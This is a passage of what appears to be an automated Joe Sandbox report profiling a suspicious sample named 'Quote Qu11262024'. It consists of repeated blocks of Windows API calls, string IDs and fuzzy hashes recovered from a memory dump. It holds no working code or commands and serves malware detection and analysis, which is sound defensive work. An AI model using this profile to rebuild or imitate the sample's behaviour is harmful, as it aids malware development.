                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1125800050-0
                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleSleep
                                                                                                    • String ID: }A
                                                                                                    • API String ID: 252777609-2138825249
                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3056473165-0
                                                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 2221118986-907554435
                                                                                                    • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                    • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: .#v
                                                                                                    • API String ID: 2081463915-507759092
                                                                                                    • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                    • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2445788494-0
                                                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1065087418-0
                                                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1381354015-0
                                                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004301AD
                                                                                                    • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1297977491-0
                                                                                                    • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                    • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2154303073-0
                                                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                    APIs
                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3150196962-0
                                                                                                    • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                    • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3154509469-0
                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4232544981-0
                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                    APIs
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
